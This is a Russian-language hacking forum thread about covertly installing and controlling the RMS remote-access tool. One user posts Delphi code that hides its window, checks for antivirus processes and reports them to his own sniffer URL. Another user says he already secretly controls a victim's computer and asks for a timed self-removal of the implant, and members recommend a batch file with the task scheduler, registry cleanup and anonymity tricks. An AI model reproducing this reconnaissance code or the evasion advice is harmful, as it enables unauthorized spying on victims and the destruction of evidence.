RMS - полностью скрытая установка и управление.


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 094
Репутация
8 212
ну если только просто хороший хакер сядет
Ну что-бы найти человека не нужно обладать какими-то хакерскими способностями !

Нужно иметь связи в определённых кругах и всё, как пример по айпишнику вычисляем провайдера, далее через знакомых, СИ или ещё как вычисляем уже нужные данные...

Ну либо зная страничку вконтакте тоже самое вычисляем емаил, телефон и движемся дальше...

А вообще есть специально обученные люди которые этим и занимаются, даже у тех-же хакеров есть спецы, которые делают деанон не знаю чем они пользуются, но бывает что деанонимизируют даже профи в таких делах !WinkSmile
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
посоветуйте может-быть как после себя следы можно замести ?) хотя бы минимально)
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
посоветуйте может-быть как после себя следы можно замести ?) хотя бы минимально)
Вот блин какой ты ленивый!Нужно не оставлять следов,чтобы их не заметать)Ну например,юзай свой РМС через халявный wi-fi в кафе (желательно в другом городе),использую к примеру такой специализированный дистрибутивчик как Tails,а самое главное поменьше болтай.Люди вокруг очень "доброжелательны" и не важно откуда ты,из России или из Украины.Мировая интернет- паутина всех связывает воедино.
Не знаю как оснащена техническая сторона тех кто стал бы тебя ловить,но самая простая схема твоей "поимки":восстанавливают покрошенную тобой винду,находят билд РМС,изучают (тут всё зависит от спец подготовки),приходят к выводу что это детище какого-то генератора билдов,а именно BuilderRMS 5.6,ищут в сети информацию на эту тему,то есть гуглят)Просматривают посты на хак форумах...и тут опа!"Смотри Первый,тут на Русфере один пацанчик взломом очень интересовался (и про деньги заикался),давай его пробъём...ага и на хэппи-хаке,только ник у него там более "говорящий",глянь и на факаве тоже.Будем брать!".
Всё это шутка конечно,но в каждой шутке,как говорится, есть доля истины.

дело в том, что я почти ничего не знаю о своей жертве )

X-Shar, я тут подумал,а если написать прожку которая проверяет процессы в системе на наличие определённых,то есть антивирусных и если такой процесс имеется-отправляет мне,например на сниффер,данные,типа у "жертвы" стоит такой-то антивирь.Это значительно облегчит дальнейшую работу в плане подбора необходимых средств для проникновения. Или я велосипед изобретаю?
Во всяком случае,накидал несколько корявых строчек на делфи.Не знаю тока,что делать с формой,как-бы вес не имеет значения,да и антивири,как мне кажется больше доверяют прогам с окнами (а может это чушь).В общем тупо скрыл её.Далее использовал функцию :
Код:
function processExists(exeFileName: string): Boolean;
var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
begin
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
  Result := False;
  while Integer(ContinueLoop) <> 0 do
  begin
	if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
	  UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
	  UpperCase(ExeFileName))) then
	begin
	  Result := True;
	end;
	ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
  end;
  CloseHandle(FSnapshotHandle);
end;
И потом только перебирал имена нужных мне процессов (к примеру для 4 антивирей):
Код:
 procedure TForm1.FormCreate(Sender: TObject);//при создании форм происходит следующее
begin
	Application.ShowMainForm:=False;//тупо скрываю форму
  if processExists('op_mon.exe') then//проверяю есть ли процесс под именем op_mon.exe
 
	IdHTTP1.Get('http://ссылка на мой сниффер?Antivirus:Outpost');//если есть,то отправляю название антивиря на сниффер
 
  if processExists('ekrn.exe') then//итак далее для каждого процееса
 
	IdHTTP1.Get('http://ссылка на мой сниффер?Antivirus:NOD');
 
 
  if processExists('AVP.exe') then
 
	IdHTTP1.Get('http://ссылка на мой сниффер?Antivirus:Kasper');
 
 
	 if processExists('MsMpEng.exe') then
 
	IdHTTP1.Get('http://ссылка на мой сниффер?Antivirus:Защитник Виндовс');
	  Application.Terminate;//закрываюсь
  end;
Ссори ещё раз за корявость,но я же только начинаю въезжать в этот дельфинарий.В итоге,Каспер залупнулся на мою прогу мол "Заблокирован переход по вредоносной ссылке" (не любит он видать сниФ на HPC).Прога выдала ошибку.НО!Данные пришли.
Снимок.JPG


Снимок.JPG



Снимогк.JPG


Прога выдала ошибку.НО!Данные пришли.Попробовал несколько раз,хоть каспер и блочит но его имя приходит мне.НОД промолчал,как и защитник виндовс.Оутпост присутствовал при компиляции,так что ему всё дозволено),хотя он спрашивал разрешение на соединение.
Вопрос в том,стоит ли её допиливать или уже существует подобный софт?
p.s.Немного спиздел про Каспера.Всё работало,пока я не добавил проверку на Защитника Виндовс.После добавления поиска этого процесса,Каспер стал блокировать мою прогу как вредоносную.С чего бы это?
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
ой я не силен во всех этих делах, вообщем суть в том что я уже на компьютере своей жертвы, но жертва не подозревает об этом, просто там дело не в очень компьютерных делах, все что мне нужно, так это можете ли помочь написать такую прогу, чтобы она по таймеру удалила этот билд? ну то есть завершив ее процессы удалить всю папку sysfiles которую создает этот билд? просто если меня вдруг спалят (я собираюсь там сидеть долго) и обрубят доступ в инет, то не помешала бы программа таймер, которая просто удалит билд через, например, 2 дня , если кто-то шарящий вдруг решит глянуть процессы , то ничего там не найдет и не будет поднимать кипишь
за прогу заплачу , мб кому не сложно написать будет, хотя я особенно не парюсь, потому что найти меня без милиции, думаю, будет сложновато , с учетом того, что никто даже ничего не подозревает и я все делаю довольно безпалевно, так что думаю что жертва так никогда обо мне и не узнает , но подстраховаться мб и стоит
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
написать такую прогу, чтобы она по таймеру удалила этот билд?
Думаю достаточно было бы батника и планировщика задач.Через определённое время запускается батник,убивает процесс РМС,удаляет папки и самоудаляется.
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
Думаю достаточно было бы батника и планировщика задач.Через определённое время запускается батник,убивает процесс РМС,удаляет папки и самоудаляется.

ну было бы не плохо, мне надо что-то типа, я захожу ставлю таймер в 2 дня , потом на следующий день захожу и отменяю и опять ставлю таймер в 2 дня, и то есть если 2 дня подряд не зайду, то он сработает
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 094
Репутация
8 212
Вопрос в том,стоит ли её допиливать или уже существует подобный софт?
Это имеет смысл, если будет элементы обхода в программе, а так ну узнал-ты что у жертвы например каспер и что, если нет способов обхода в программе, а так да некоторые ботнеты имеют такой функционал отображения, какой АВ у жертвы...
я уже на компьютере своей жертвы
А если не секрет, а какой у жертвы АВ ?

Можно написать батник, который удаляет папку с вирусом и чистить реестр...

И ещё здесь в теме есть сборка в которой есть файл отвечающий за деинсталяцию RMS у жертвы, поэтому если использовать этот файл, то достаточно просто прописать его запуск в планировщике !WinkSmile
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Это имеет смысл, если будет элементы обхода в программе, а так ну узнал-ты что у жертвы например каспер и что, если нет способов обхода в программе, а так да некоторые ботнеты имеют такой функционал отображения, какой АВ у жертвы...
Так то оно так.Но эта прога не предполагала иметь дополнительные модули для обхода защиты (ибо знаний хватает только форму с кнопкой)).Это просто как шпиён-разведчик.Закинул его,узнал АВ и потом экспериментируешь только с данным АВ.Пробуешь различные крипторы,тулзы или гуглишь способы обхода.
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
у жертвы нету АВ вообще, жертва ничего не качает на этот комп , кроме фотографий (работа такая)
так что вирусов наивно не боится походу :D
пока не проявляю особой активности , жертва даже не подозревает ничего
И ещё здесь в теме есть сборка в которой есть файл отвечающий за деинсталяцию RMS у жертвы, поэтому если использовать этот файл, то достаточно просто прописать его запуск в планировщике !WinkSmile
сейчас мне лень что-либо делать , но в ближайшее время займусь вот этим, спасибо )
 
R

Rabbit-PGN

Гость
По мне, так любую скрытую прогу можно вычислить, а эу тем более.. :)
 
Верх Низ